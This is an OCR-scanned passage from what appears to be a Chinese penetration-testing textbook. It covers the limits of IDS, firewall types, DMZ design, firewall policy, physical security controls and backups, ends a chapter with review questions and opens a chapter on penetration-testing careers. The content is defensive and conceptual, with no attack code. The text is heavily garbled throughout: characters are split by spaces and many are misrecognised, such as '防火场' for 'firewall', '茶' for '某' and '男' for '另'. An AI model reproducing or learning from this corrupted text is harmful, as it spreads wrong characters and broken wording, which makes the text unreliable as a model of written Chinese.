但 问题 实际 上 并 不 存在 一 一 某 些 原因 触发 IDS 系 统 ， 发 出 了 虚假 的 攻击 和 警报。 此外， 不 要 


犯 许多 安全 专业 新 手 所 犯 的 错误 : 认为 IDS 有 能 力 应 对 和 阻止 威胁 。 记 住 IDS 中 的 DD 代表 检 
测 ， 而 检测 就 是 如 此 一 一 它 会 检测 到 某 个 问题 ， 但 它 不 会 做 出 反应 或 啊 应 。 实 际 上 ， 这 最 
后 一 点 间接 说 明了 ， 应 该 始终 在 整体 层次 上 而 不 是 依赖 独立 的 组 件 实现 安全 性 的 原因 : 
一 个 独立 的 组 件 ， 以 IDS 为 例 ， 它 只 会 通知 正在 发 生 攻 击 ， 而 不 会 进行 任何 应 对 攻击 的 
操作 。 

不 要 期 望 IDS 能 够 检测 到 网 络 上 的 每 个 可 疑 事件 并 发 出 通知 ; 它 只 会 检测 并 报告 设 
置 要 求 其 检测 的 内 容 。 还 应 考虑 IDS 的 程序 是 为 检测 特定 类 型 的 攻击 设计 的 这 一 事实 ， 并 
且 由 于 攻击 的 进化 迅速 ，IDS 无 法 检测 到 其 未 进行 针对 性 检测 编程 或 设计 的 那些 攻击 。 记 
住 ，IDS 只 是 一 种 用 于 辅助 的 工具 ， 不 能 代 蔡 良好 的 安全 技能 或 尽职 尽责 的 工作 态度 。 


17.2.4 ”调查 事件 


IDS 提 供 了 一 种 检测 攻击 的 方法 ， 但 并 不 处 理 攻击 。IDS 在 攻击 或 条 种 活动 发 生 时 可 
能 采取 的 行动 受到 限制 。IDS 观 察 ， 比 较 和 检测 入 侵 并 将 其 报告 。 系 统 或 网 络 管理 员 必 
须 跟 进 。 系 统 能 做 的 所 有 工作 ， 就 是 在 发 现 异 第 时 发 出 通知 ; 它 不 能 为 单个 事件 一 一 列 出 
原因 。 

从 IDS 收 集 的 信息 可 能 生成 速度 非常 快 ， 并 且 这 些 数 据 需 要 和 仔细 分 析 ， 以 确保 捕获 可 
能 有 和 害 的 每 一 个 潜在 活动 。 你 需要 负责 制定 和 实施 计划 ， 以 分 析 产 生 的 海量 数据 ， 并 确保 
捕获 任何 可 疑 的 活动 。 


17.3” ”防火墙 


在 许多 情况 下 ， 与 IDS 协 同 工 作 的 是 一 类 称 为 防火 场 的 设备 。 简 单 来 说 ， 防 火场 是 用 
于 控制 去 往 或 来 目 ( 或 “进出 ”) 茶 个 网 络 的 访问 的 设备 。 目 从 多 年 前 最 初 推出 以 来 ， 防 火 
墙 已 经 发 生 了 巨大 变化 ， 以 更 好 地 保护 其 所 在 网 络 。 由 于 其 具备 的 强大 能 力 ， 防 火场 已 经 
成 为 网 络 安全 领域 的 一 个 日 益 重 要 的 组 成 部 分 ， 你 必须 牢 牢 掌握 这 项 技术 。 

在 大 多 数 情况 下 ， 防 火 墙 位 于 网 络 的 边界 ， 在 此 处 阻止 或 控制 流入 和 流出 客户 端 网 络 
的 流量 的 效果 最 佳 。 由 于 使 用 这 一 理想 位 置 ， 防 火 墙 能 够 完全 规范 和 控制 流量 的 类 型 。 系 
统 所 有 者 根据 其 特定 需求 ， 配 置 一 系列 规则 ， 确 定 能 够 穿 过 防火 墙 的 流量 。 例 如 ， 系 统 所 
有 者 可 以 选择 允许 Web 流 量 通过 ， 但 不 允许 其 他 类 型 的 流量 (例如 文件 共享 协议 ) 通 过 ， 因 
为 他 们 认为 后 者 是 非 必需 的 ， 并 且 存 在 安全 风险 。 
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对 于 最 早 型 号 的 防火 墙 ， 以 今天 的 标准 而 言 ， 配 置 允许 /不 允许 访问 的 过 程 相当 简 
单 。 较 旧 的 设备 只 需要 设计 用 于 检查 数据 包头 中 包含 的 某 些 信息 的 规则 。 虽 然 此 类 的 防火 
墙 仍然 存在 ， 而 且 现代 防火 墙 也 包含 相同 的 规则 系统 ， 但 现在 的 防火 墙 已 经 发 生 了 进化 ， 
以 适应 对 层出不穷 、 更 为 复杂 的 攻击 形式 的 阻止 和 处 理 。 由 于 攻击 的 迅速 增加 ， 并 且 富 于 
创造 力 ， 过 去 的 防火 墙 如 果 不 进 化 ， 就 不 得 不 面 对 它们 已 经 无 法 应 对 问题 的 事实 。 

为 了 应 对 出 现 的 威胁 ， 防 火 墙 增加 了 新 功能 ， 以 便 更 好 地 为 部 署 时 它们 将 面临 的 种 种 
攻击 做 准备 。 结 果 是 比 过 去 任何 时 候 ， 防 火 墙 都 能 更 好 地 处 理 和 控制 未 经 授权 的 和 不 良 的 
行为 。 


17.3.1 防火 场 的 原理 


如 果 你 简单 地 使 用 Google 搜 索 查找 防火 墙 ， 无 疑 会 获得 无 数 结果 ， 其 中 许多 结果 链接 
到 各 种 防火 墙 软 件 和 硬件 的 供应 商 。 你 会 很 快 发 现 ， 每 个 供应 商都 有 自己 的 描述 防火 墙 的 
方式 。 但 是 ， 当 查看 这 些 信息 时 ， 请 注意 ， 供 应 丙 为 了 吸引 潜在 客 尸 ， 会 将 他 们 的 产品 宣 
传 得 天 花 乱 险 。 如 果 据 弃 掉 所 有 营销 喷头 、 炫 目的 广告 ， 就 会 发 现在 某 种 程度 上 上， 防火 墙 
的 工作 原理 通常 非常 相似 。 

防火 墙 的 工作 模式 可 能 是 下 列 二 者 之 一 : 

@ 包 过 滤 

@ 代理 服务 器 /应 用 层 网 关 

包 过 滤 型 防火 墙 可 以 认为 属于 第 一 代 防 火 墙 。 按 照 后 代 防 火 墙 的 标准 ， 分 类 为 包 过 滤 
型 的 那些 防火 墙 或 许 比较 原始 ， 但 是 防火 墙 中 它们 确实 有 其 一 席 之 地 ， 并 且 在 许多 部 署 中 
仍然 得 到 非常 有 效 的 应 用 。 为 说 明 为 何 包 过 滤 防 火 墙 仍 在 使 用 ， 下 面 将 分 析 包 过 滤 防 火 墙 
的 运行 方式 。 防 火 墙 要 真正 成 为 一 个 包 过 滤 设 备 或 系统 ， 它 必须 在 一 个 非常 基础 的 级 别 上 
检查 每 个 数据 包 一 一 这 意味 着 防火 墙 将 检查 一 条 信息 (数据 包 ) 的 来 源 和 目的 地 址 ， 以 及 该 
数据 包 正 在 使 用 的 端口 或 协议 。 为 了 正确 地 过 滤 所 需 和 不 需要 的 流量 ， 系 统 或 网 络 管理 员 
按照 所 需 的 规则 配置 防火 墙 ， 这 些 规则 将 在 数据 包 符 合 某 个 给 定 规 则 条 件 时 对 数据 包 执 行 
适当 的 操作 。 

仔细 分 析 一 个 包 过 滤 防 火 墙 ， 很 容易 看 出 其 功能 是 非常 有 限 的 。 它 只 会 检查 数据 包 
中 非常 有 限 的 一 部 分 信息 。 如 前 所 述 ， 包 过 滤 防 火 墙 仅 检查 (数据 包 ) 的 来 源 和 目的 地 址 ， 
以 及 该 数据 包 正 在 使 用 的 端口 或 协议 ; 该 类 型 的 防火 墙 无 法 分 析 该 数据 包 中 可 能 存在 的 其 
他 任何 内 容 。 包 过 滤 防 火 墙 的 实现 非常 简单 ， 并 且 严 格 地 执行 其 设计 功能 ， 但 是 由 于 其 只 
能 检查 数据 包 中 的 有 限 部 分 信息 ， 因 此 对 不 属于 检查 项 目的 内 容 ， 此 类 防火 墙 基 本 视 夺 无 
睹 。 实 际 上 ， 这 意味 着 ， 虽 然 包 过 滤 防 火 墙 可 以 控制 流量 ,仍然 有 可 能 成 功 进行 攻击 。 

这 种 类 型 的 防火 墙 仍 在 使 用 ， 但 这 就 引出 了 一 个 问题 : 如 果 其 功能 如 此 简单 ， 这 是 为 
什么 ?虽然 设计 的 简单 性 确实 在 性 能 方面 有 好 处 ， 但 这 种 类 型 的 防火 墙 只 会 检查 最 基本 的 
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信息 ， 而 不 会 进一步 深入 。 当 确 知 网 络 上 不 会 使 用 茶 种 协议 时 ， 这 种 防火 场 是 有 效 的 ， 你 
可 以 简单 地 阻止 该 类 协议 数据 ， 使 其 不 能 流入 网 络 或 流出 网 络 。 例 如 ， 如 果 确 认 FTP 是 一 
种 安全 风险 ， 并 且 决 定 不 在 网 络 上 使 用 FTP， 则 可 以 使 用 包 过 滤 防 火 墙 来 阻止 它 甚 至 阻止 
它 首 先进 入 网 络 。 当 你 知道 你 不 需要 它 时 ， 无 须 使 用 FTP 过 滤 包 中 的 内 容 ， 因 此 包 过 渡 防 
火 墙 可 以 直接 丢弃 数据 包 ， 而 不 是 传递 数据 包 进 行进 一 步 分 析 。 

后 续 的 一 代 防 火 墙 称 为 代理 服务 器 ， 有 时 也 称 为 应 用 程序 网 关 。 通 过 将 代理 服务 器 
添加 到 组 合 中 ， 防 火 墙 现在 具有 内 置 (或 称 本 地 ) 功 能 ， 可 对 数据 包 进 行 更 详细 的 检查 或 分 
析 ， 而 不 只 是 检查 数据 包头 的 一 部 分 。 简 而 言 之 ， 这 意味 看 这 种 类 型 的 防火 墙 能 够 检查 数 
据 包 的 内 容 。 关 于 此 类 的 防火 墙 与 包 过 滤 防 火 墙 的 关系 ， 可 将 包 过 滤 防 火 墙 想象 为 仅 分 析 
一 个 信封 上 的 地 址 标签 。 男 一 方面 ， 代 理 或 应 用 程序 级 别 的 防火 墙 则 将 在 做 出 下 一 步 如 何 
行动 判断 之 前 ， 人 和 仔细 分 析 信 封 内 的 内 容 及 其 布局 和 打包 方式 。 通 过 深度 检查 来 回 通 过 防火 
墙 流量 的 能 力 ， 系 统管 理 员 能 够 更 为 细致 地 微调 允许 或 阻止 的 流量 类 型 。 

在 实践 中 ， 代 理 服 务 器 是 基于 拦截 通信 内 容 的 思路 设计 和 部 署 的 软件 。 代 理 服 务 器 将 
监视 并 识别 传 入 的 请 求 ， 并 代表 客户 端 问 服务 器 发 出 请 求 。 最 终 的 结果 是 ， 客 户 端 不 与 服 
务 髓 直接 联系 ， 代 理 服 务 器 作为 中 苇 方 (go-between) 或 称 中 间 人 (man-in-the-midqdle)。 

如 前 所 述 ， 此 类 使 用 代理 服务 器 的 配置 可 以 根据 数据 包 中 的 实际 信息 允许 或 拒绝 流 
量 。 其 缺 扣 则 是 更 多 的 分 析 意 味 看 更 多 的 开销 ， 因 此 将 付出 性 能 的 代价 。 


17.3.2 ”防火 场 的 局 限 性 


即使 从 上 文 对 防火 墙 进 行 的 简略 介绍 就 能 看 出 ， 它 们 似乎 功能 十 分 强大 ， 并 且 可 以 在 
保护 网 络 方面 大 显 映 手 。 然 而 ， 防 火 墙 技 术 也 存在 局 限 性 ， 有 些 场 合 确实 不 适合 使 用 防火 
墙 。 了 解 它们 何 时 能 有 所 帮助 ， 何 时 则 没有 ， 对 于 正确 和 有 效 地 使 用 防火 墙 至 关 重 要 。 在 
决定 购买 或 以 其 他 方式 获取 防火 墙 搁 术 之 前 ， 请 确保 它 可 以 处 理 所 试 图 解决 的 具体 问题 ， 
以 及 正确 解决 该 问题 所 需 的 防火 墙 类 型 。 在 构建 一 个 则 在 使 网 络 环 境 更 安全 的 设计 时 ， 必 
须 始终 准确 地 把 握 目 标 。 遗 憾 的 是 ， 许 多 公司 在 对 于 需要 解决 的 问题 以 及 如 何 解 决 这 些 问 
题 并 不 具备 明确 的 目标 或 路 径 时 ， 束 采购 防火 墙 以 及 其 他 重要 的 设备 。 简 而 言 之 ， 在 转动 
凡 火 钥匙 ， 躁 下 油门 发 动车 辆 之 前 ， 先 要 知道 目的 地 。 对 本 案例 而 言 ， 为 条 个 任务 选择 了 
错误 的 防火 墙 将 导致 发 生 恶 意 或 意外 事件 的 可 能 ， 其 至 可 能 给 你 一 种 虚假 的 安全 感 ， 因 为 
你 认为 防火 墙 已 经 发 挥 了 作用 ， 但 实际 上 它 并 不 适合 其 部 署 方 式 。 

下 列 领 域 代表 了 防火 墙 难以 或 无 法 阻止 的 活动 和 事件 : 

病毒 ”虽然 某 些 防 火 墙 具 有 包括 扫描 和 阻止 病毒 的 能 力 ， 但 反 病 毒 并 不 被 视 为 防火 墙 
的 固有 能 力 ， 也 不 应 该 依赖 防火 墙 的 该 项 能 力 。 还 应 考虑 到 ， 随 奢 病 毒 发 展 进化 为 新 的 形 
式 ， 防 火 墙 很 有 可 能 失去 了 轻松 检测 它们 的 能 力 ， 需 要 更 新 。 在 大 多 数 情 况 下 ， 防 火 墙 中 
的 防 病毒 软件 无 法 也 不 应 该 苦 代 驻 留 系 统 的 防 病毒 软件 。 
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误 用 这 是 防火 墙 难以 解决 的 男 一 个 问题 ， 因 为 员工 总 会 具有 更 高 级 别 的 系统 访问 权 
限 。 这 与 某 个 员工 无 视 “不 要 目 带 软件 或 从 互联 网 下 载 软件 ”之 类 规章 的 恶习 结合 ， 就 是 
灾难 的 原因 。 防 火 墙 无 法 很 好 应 对 故意 的 行径 。 

第 二 连接 ”在 茶 些 场合 中 存在 有 (不 通过 防火 场 的 ) 第 二 连接 ， 这 是 一 个 重大 安全 问 
题 。 例 如 ， 如 果 部 闭 了 防火 墙 ， 但 员工 可 以 将 电话 插头 拔 下 插入 到 计算 机 中 ， 并 在 Modem 
工作 时 将 计算 机 连 入 网 络 ， 这 就 提供 了 一 个 绕 过 防火 墙 的 后 门 。 

社会 工程 ”如 果 网 络 管理 员 将 防火 墙 配 置 泄露 给 菜 个 从 ISP 打 电话 过 来 的 人 ， 而 不 验 
证 打 电话 者 的 身份 ， 这 就 有 严重 的 问题 。 

不 展 设 计 ”如果 茶 个 防火 场 的 设计 未 经 深思 熟 虑 或 未 得 到 恨 好 的 实现 ， 结 果 就 是 防火 
墙 无 法 成 为 一 堵 坚 实 的 壁垒 ， 而 更 像 一 块 和 干净 百 孔 的 奶酪 。 应 始终 确保 遵循 适当 的 安全 集 
略 和 做 法 。 


17.3.3 ”实现 防火 墙 


与 许多 技术 一 样 ， 防 火场 有 许多 不 同 的 部 署 方式 ， 而 且 并 没有 一 种 部 署 这 些 网 络 安 
全 关键 组 件 的 标准 方式 。 但 是 ， 可 以 首先 讨论 在 可 用 的 选项 中 可 使 用 的 基本 配置 ， 然 后 
再 决定 是 否 需 要 增强 或 修改 这 些 配 置 ， 以 获得 更 适合 需求 的 结果 。 下 面 介绍 这 些 选 项 中 
的 一 些 。 
@ 实现 防火 墙 的 一 种 方法 是 使 用 所 谓 的 多 和 宿主 (multihomed) 设 备 。 多 宿主 设备 是 指 具 
有 三 个 或 更 多 网 络 适配器 的 设备 。 通 常 每 个 网 络 适配器 都 将 连接 到 不 同 的 网 络 ， 
防火 墙 管 理 员 则 负责 配置 规则 ， 以 确定 在 不 同 接口 之 间 如 何 转发 或 拒绝 数据 包 。 
此 类 设备 和 配置 并 不 罕见 ， 在 实际 应 用 中 可 以 见 到 相当 多 。 但 是 ， 在 讨论 这 种 类 
型 的 设备 时 ， 需 要 记 住 一 些 要 点 。 这 种 类 型 的 配置 的 优点 是 ， 只 用 一 个 设备 即 可 
设置 一 个 周 界 网 络 (perimeter network) 或 DMZ( 本 书 稍 后 将 介绍 )。 这 种 配置 还 具有 
简单 的 优点 ， 因 为 它 将 一 组 多 个 设备 集成 到 一 个 设备 中 ， 从 而 减少 管理 开销 和 维 
护 工 作 量 。 在 缺点 方面 ， 该 设备 意味 着 一 个 可 能 的 单 点 故障 ， 也 就 是 说 ， 如 果 设 
备 被 攻陷 ， 或 配置 不 正确 ， 则 可 能 导致 允许 无 限制 的 访问 ， 或 至 少 是 对 运营 环境 
的 不 同 部 分 的 非法 访问 。 
@ 更 有 价值 的 是 被 称 为 屏蔽 主机 (screened hosb 的 配置 。 这 种 类 型 的 配置 将 包 过 滤 防 
火 墙 与 代理 服务 器 组 合 起 来 ， 以 实现 更 快 更 高 效 的 配置 ， 但 将 以 某 种 程度 上 降低 
安全 性 为 代价 。 只 需要 通过 分 析 使 用 的 设备 ， 即 可 轻松 识别 这 种 类 型 的 配置 。 在 
此 配置 中 ， 由 于 流量 尝试 进入 受 保护 的 网 络 ， 因 此 首先 会 遇 到 将 对 流量 进行 包 过 
滤 的 路 由 器 。 然 后 ， 如 果 包 过 滤 人 允许 流量 通过 ， 它 将 会 遇 到 一 个 代理 ， 该 代理 将 
依次 执行 目 身 的 过 滤 操 作 ， 例 如 查找 受 限 制 的 内 容 或 不 允许 的 流量 类 型 。 这 种 类 
型 的 设置 通 音 用 于 建立 一 个 也 称 为 DMZ( 非 军事 区 ) 的 外 围 网 络 。 
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@ DMZ 是 网 络 安全 的 重要 组 成 部 分 。 简 言 之 ，DMZ 可 以 被 视 为 一 个 夹 在 两 个 防火 墙 

之 间 的 有 限 的 或 小 型 的 网 络 ;， 在 这 些 防火 墙 之 外 ， 是 外 部 世界 ( 即 Internet)， 而 男 
一 侧 则 是 内 部 网 ， 也 就 是 客户 的 受 保护 的 网 络 。 支 撑 这 种 类 型 部 署 的 思路 ， 是 可 
以 在 DMZ 中 托管 供 公开 访问 或 可 用 的 服务 ， 如 Web 服 务 器 。 例 如 ， 如 果 客 户 和 希望 
染 设 自己 的 Web 服 务 器 并 将 内 容 提 供给 公众 ， 就 可 以 建立 一 个 DMZ， 并 将 Web 服 
务 器 放置 在 该 区 域内 。 如 果 没 有 DMZ， 且 只 有 一 个 防火 墙 ， 就 需要 进行 选择 ， 要 
么 将 Web 服 务 器 置 于 Internet 侧 ， 要 么 将 其 置 于 防火 墙 的 内 部 网 侧 。 两 个 选项 都 不 
实用 。 如 果 将 服务 器 置 于 互联 网 上 ， 它 将 完全 暴露 ， 没 有 保护 措施 ， 如 果 将 其 置 
于 客户 的 私有 网 络 中 ， 那 么 就 必须 给 予 外 部 世界 对 客户 网 络 的 访问 权 ， 从 而 开启 
多 种 潜在 恶意 行为 的 门 亩 。 然 而 ， 通 过 使 用 DMZ， 只 有 选择 的 流量 才能 通过 面 回 
Iternet 的 防火 墙 访问 Web 服 务 器 ， 而 不 允许 任何 来 自 外 部 的 流量 。 通 过 隔离 DMZ 
与 客户 网 络 的 防火 墙 ， 从 而 同时 避免 了 上 述 的 两 个 问题 。 当 然 ， 对 于 从 客户 网 络 
流出 的 流量 也 有 不 同 的 限制 。 


17.3.4 ”制定 防火 墙 傈 上 略 


在 安 滚 防火墙 之 前 ， 需 要 制定 一 个 计划 ， 定 义 如 何 配 置 防火 墙 和 预期 目标 ， 这 就 是 集 
上 略 承 担 的 角色 。 策 略 是 规定 防火 墙 如 何 安装 、 配 置 和 管理 的 蓝图 。 它 将 确保 解决 方案 能 
以 所 需 的 方式 解决 正确 的 问题 ， 并 减少 任何 不 希望 出 现 的 可 能 性 。 

为 了 正确 设计 和 实施 防火 场 ， 必 须 提 前 制定 防火 场 策略 。 防 火 墙 集 略 是 组 织 整体 安全 
策略 的 一 个 小 子 集 部 分 。 防 火场 策略 将 以 茶 种 方式 适应 整个 公司 的 安全 策略 ， 维 护 组 织 的 
安全 目标 ， 并 通过 防火 墙 设备 实施 和 支持 这 些 目 标 。 

创建 的 防火 墙 策 略 通 常会 以 两 种 方式 之 一 处 理 控 制 进出 组 织 的 流量 问题 。 第 一 个 方 
式 是 隐 式 允许 所 有 内 容 ， 只 显 式 地 拒绝 那些 不 想 要 的 内 容 。 男 一 个 方式 是 隐 式 拒绝 所 有 内 
容 ， 而 只 放行 确 知 需要 的 内 容 。 这 两 个 选项 代表 了 两 种 截然 不 同 的 防火 墙 配 置 方 法 。 在 第 
一 个 方式 中 ， 除 非 男 有 声明 ， 否 则 将 允许 所 有 内 容 明 过 ， 而 后 者 除非 男 有 声明 ， 否 则 将 不 
允许 任何 内 容 通 过 。 显 然 ， 在 默认 情况 下 ， 一 个 比 男 一 个 要 安全 得 多 。 

考虑 隐 式 拒绝 的 选项 ， 它 是 假定 所 有 流量 除了 已 经 被 明确 允许 的 之 外 都 应 拒绝 的 观 
氮 。 通 第 情况 下 ， 从 网 络 /安全 管理 员 的 角度 来 看 ， 长 期 运行 中 这 样 做 更 为 简单 。 例 如 ， 
可 以 设想 创建 木马 程序 使 用 的 所 有 闯 口 列表 ， 以 及 授权 应 用 程序 使 用 的 所 有 端口 ， 然 后 创 
建 阻止 它们 的 规则 ， 然 后 对 比 一 下 创建 用 户 允 许 使 用 功能 的 列表 ， 并 明确 授予 他 们 访问 这 
些 服务 和 应 用 程序 的 权限 ， 显 然后 者 工作 量 要 小 得 多 。 


17.3.5 ”网 络 连 接 策 上 略 


该 部 分 策略 涉及 哪些 类 别 的 设备 和 连接 被 允许 /将 被 允许 接 入 公司 所 有 的 网 络 。 可 以 
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期 望 在 其 中 找到 有 关 网 络 操作 系统 、 设 备 类 型 、 设 备 配置 和 通信 类 型 的 信息 。 


17.4 ”物理 安全 控制 项 


物理 安全 控制 是 最 显而易见 的 安全 控制 措施 形式 之 一 。 该 类 别 的 控制 措施 包括 屏障 、 
保安 、 摄 像 涉 、 锁 以 及 其 他 类 型 的 措施 。 从 根本 上 说 ， 物 理 控制 由 在 比 其 他 类 型 的 控制 更 
为 直接 地 保护 人 人员、 设施 和 设备 。 
一 些 预 防 性 安全 控制 措施 包括 : 
@ 备用 电源 
@ 潜水 管理 
数据 备份 
围栏 
保安 人 员 
nl 
生物 识别 技术 
场所 选择 
一 般 来 说 ， 可 以 依靠 电力 公司 为 组 织 提供 干净 、 稳 定 和 充足 的 电力 ， 但 并 非 总 是 如 
此 。 然 而 ， 任 何在 办 公 楼 或 其 他 类 型 的 设施 工作 过 的 人 ， 都 至 少 经 历 过 一 次 因 供电 不 足 导 
致 的 灯光 闪烁 ， 如 果 不 是 一 次 全 面 停 电 的 话 。 备 用 电源 可 以 在 不 同 程度 上 解决 这 些 问 题 。 
卡特 里 娜 飓风 癌 我 们 展示 了 自然 灾害 可 能 具有 何等 破坏 力 ， 但 灾难 不 仅仅 是 飓风 ， 还 
有 它 带 来 的 洪水 。 虽 然 不 一 定 能 够 阻止 洪水 ， 但 可 以 采取 洪水 管理 策略 来 缓解 影响 。 选 择 
建设 在 不 容易 发 生 淹 水 的 场所 的 设施 是 选项 之 一 。 充 足 的 排水 和 类 似 措施 也 会 有 所 帮助 。 
最 后 ， 将 诸如 服务 器 之 类 的 设备 安装 在 地 板 之 上 几 英 寸 也 有 一 定 帮助 。 
数据 备份 是 另 一 种 通常 用 于 保护 资产 的 物理 控制 。 不 要 低估 这 一 事实 ， 即 备份 关键 系 
统 是 可 以 使 用 的 最 重要 的 工具 之 一 。 此 类 流程 为 硬件 故障 和 其 他 类 型 的 系统 故障 提供 了 重 
要 的 保护 。 
并 非 所 有 备份 都 不 分 优 务 ， 而 正确 的 备份 关系 重大 : 
@ 完全 备份 (full backup) 是 对 卷 上 所 有 数据 的 完整 备份 ; 此 类 备份 通常 需要 耗费 最 长 
的 运行 时 间 。 
@ 增 量 备份 (incremental backup) 仅 复制 自 上 次 备份 以 来 发 生 更 改 的 文件 和 其 他 数据 。 
此 类 备份 的 优点 是 所 需 时 间 少 得 多 ， 因 此 完成 得 更 快 。 缺 点 则 是 重建 系统 时 这 种 
备份 需要 更 多 的 时 间 。 


@ 差异 备份 (differential backup) 能 够 同时 减少 备份 时 间 并 加 快 恢复 过 程 。 差 异 备份 复 
制 茶 个 卷 目 从 上 次 完全 备份 以 来 的 更 改 内 容 。 

围栏 是 一 种 物理 控制 ， 是 用 于 阻止 偶然 入 侵 者 的 障碍 物 。 虽 然 有 的 组 织 愿 意 安装 带 有 
铁丝 网 和 其 他 防御 功能 的 高 墙 ， 但 并 不 总 是 如 此 。 通 常 ， 围 栏 将 按照 满足 组 织 的 安全 性 需 
求 来 设计 ， 如 果 公 司 只 是 一 家 面包 店 ， 而 并 不 执行 有 关 国 家 安全 的 职责 ， 围 栏 设计 肯定 会 
有 所 不 同 ， 因 为 需要 保护 的 目标 不 同 。 

保安 人 员 提 供 一 种 安全 措施 ， 能 够 对 意外 做 出 只 有 人 才能 做 出 的 有 反应。 归根 到 底 ， 技 
术 可 以 做 很 多 事情 ， 但 它 不 能 代 奉 人 的 因素 和 大 脑 。 此 外 ， 一 旦 入 侵 者 决定 破坏 安全 ， 保 
安 人 员 是 一 种 防止 他 们 实际 触及 关键 资产 的 快速 啊 应 手段 。 

最 币 见 的 物理 控制 形式 是 永远 流行 者 的 锁 。 锁 可 以 采用 多 种 形式 ， 包 括 钥 是 锁 、 密 码 
锁 、 防 盗 锁 和 其 他 类 型 的 锁 ， 所 有 的 类 型 都 是 设计 用 于 保护 资产 的 。 


17.5 ”本章 小 结 


需要 处 理 的 挑战 之 一 是 ， 确 保 所 采用 的 对 抗 措施 实际 上 能 够 按 预 期 正常 运行 。 该 状态 
成 为 挑战 的 原因 是 ， 计 划 使 用 的 工具 具备 完成 能 力 ， 但 还 需要 确保 它们 始终 能 够 按照 设计 
目标 运行 。 今 天 制定 的 控制 措施 可 能 无 法 处 理 明天 出 现 的 问题 。 此 外 ， 网 络 和 基础 架构 将 
变 得 日 趋 复 杂 ， 而 且 移 动 办 公 并 使 用 高 级 连接 技术 (如 VPN) 的 员工 也 会 越 来 越 多 。 

所 有 这 些 复杂 性 大 大 增加 了 管理 安全 性 的 同时 维持 网 络 的 可 用 性 和 能 力 的 难度 。 男 外 
要 考虑 的 一 点 是 ， 为 了 使 所 有 这 些 系统 有 效 协 作 ， 必 须 在 系统 中 建立 一 定 程度 的 信任 ， 这 
意味 看 一 个 系统 需要 授予 男 一 个 系统 茶 种 程度 的 信用 。 保 护 网 络 和 基础 设施 需要 混合 使 用 
多 种 功能 和 技术 ， 其 中 一 些 已 在 本 书 中 介绍 过 。 在 过 去 ， 已 在 防止 攻击 方面 投入 了 相当 的 
努力 ， 但 应 如 何 应 对 那些 新 的 或 意料 之 外 的 攻击 突破 防御 的 场合 ? 当然， 可 以 通过 使 用 
防火 墙 、 策 略 和 其 他 技术 来 阻止 攻击 ， 但 还 有 其 他 一 些 技 术 能 够 有 所 帮助 。 这 正 是 检测 技 
术 发 挥 作用 之 处 ，IDS 之 类 的 设备 和 技术 可 以 帮助 你 。 


1. 何谓 DMZ? 

2. 何谓 多 宿主 网 络 ? 

3. 何谓 基于 知识 的 IDS ? 

4. NIDS 应 部 署 在 网 络 中 的 何 处 ? 
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渗透 测试 可 以 成 为 一 项 激动 人 心 同时 回报 丰厚 的 工作 和 和 事业。 由 于 技术 的 快速 变化 和 和 
世界 上 威胁 和 不 稳定 因素 的 不 断 增 加 ， 你 的 生活 永远 不 会 枯燥 无 味 。 随 着 黑客 攻击 的 频 发 
和 危害 程度 的 日 益 加 剧 ， 并 越 来 越 频繁 地 获得 越 来 越 敏感 的 信息 ， 能 够 识别 、 了 解 各 种 缺 
陷 ， 并 通过 败 智 的 漏洞 利用 证 明 其 业务 影响 的 渗透 测试 者 ， 将 在 解决 许多 组 织 的 安全 防护 
难题 方面 发 挥 重要 作用 。 

本 章 将 在 你 路 上 渗透 测 旗 之 路 之 际 ， 给 出 一 些 非 撤 术 性 的 经 验 建议 。 


本 章 将 学 习 : 

选择 一 条 职业 发 展 路 线 
建立 一 个 参考 图 书馆 
选择 练习 的 工具 
练习 技术 写作 能 力 


国人 


18.1 ”选择 职业 发 展 路 线 


在 与 客 尸 和 学 生 合作 的 多 年 中 ， 笔 者 经 和 常 遇 到 的 一 个 问题 是 “我 要 如 何 进 入 渗透 测 
试 领域 ? ”遗憾 的 是 ， 这 个 问题 并 不 像 想 象 的 那么 简单 。 要 成 为 一 名 渗透 测试 人 员 有 许多 
途径 ， 本 节 将 仅 讨 论 可 能 采取 的 几 种 途径 。 记 住 ， 你 自己 的 个 人 经 历 可 能 与 这 里 介绍 的 不 
同 。 事 实 上 ， 你 可 能 会 发 现 ， 你 的 职业 生涯 可 能 多 次 改变 路 人 笃 ， 最 终 仍 能 达到 目标 。 

对 笔者 而 言 ， 进 入 渗透 测试 世界 之 旅 ， 开 始 于 在 幼年 时 荆 捣 技术 。 我 一 直 襄 欢 拆 开 便 
件 ， 将 试 不 同 的 事物 。 我 也 想 知道 一 个 软件 的 每 个 功能 到 展 有 何 作 用 ， 我 想 知道 如 何 使 软 
件 执 行 非 预期 的 操作 。 我 得 到 正规 的 教育 和 工作 经 验 ， 则 是 在 我 党 试 各 种 技术 ， 阅 读 无 数 
书籍 ， 做 了 大 量 的 实际 工作 一 些 年 以 后 的 事情 。 

下 面 是 一 些 可 供 选 择 的 渗透 测试 人 员 职 业 发 展 路 线 : 


安全 或 人员 转 行 渗透 测试 

这 是 一 种 常见 的 路 线 ， 茶 人 在 IT 领域 入 行 ， 然 后 受训 并 转 任 到 渗透 测试 者 职位 。 这 在 
企业 环境 和 其 他 大 型 机 构 中 很 流行 ， 这 些 机 构 存 在 很 多 交叉 培训 到 其 他 职位 的 机 会 ， 其 中 
也 可 能 包括 跟随 当前 人 员 的 实习 。 
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然而 ， 这 条 路 线 也 有 其 缺点 。 为 了 转换 角色 ， 你 可 能 需要 在 一 段 时 间 内 投入 目 己 的 时 
间 和 人 金钱。 通常 这 意味 看 你 可 能 需要 自行 学 习 一 些 基 础 知识 ， 并 且 愿 意 在 正式 转 任 之 前 做 
超出 本 职 的 工作 。 这 种 额外 的 时 间 和 精力 不 仅 表明 你 愿意 承 话 并 投资 于 目 己 ， 而 且 还 回 管 
理 层 证明 你 已 准备 好 从 一 项 工作 跳 转 到 另 一 项 工作 。 对 于 渗透 测试 而 言 ， 你 甚至 可 以 参与 
或 旁观 测 试 ， 并 参与 经 验 丰富 的 渗透 测试 人 员 对 数据 和 结果 的 分 析 。 

现 已 具备 IT 技 能 的 人 将 拥有 优势 ， 因 为 测试 过 程 中 将 使 用 其 中 许多 技能 (如 网 络 、 操 
作 系 统 和 管理 原则 )。 


为 进行 渗透 测试 的 安全 公司 工作 

这 种 路 径 最 适合 那些 已 具备 经 过 多 年 培养 的 技能 的 人 。 选 择 这 条 路 线 的 人 已 经 拥有 让 
富 的 一 般 IT 经 验 以 及 一 定 程度 的 渗透 测试 经 验 。 某 些 安全 公司 将 聘请 此 类 人 员 ， 并 通过 安 
排他 们 与 现 有 团队 共同 工作 ， 完 成 对 他 们 的 培训 。 

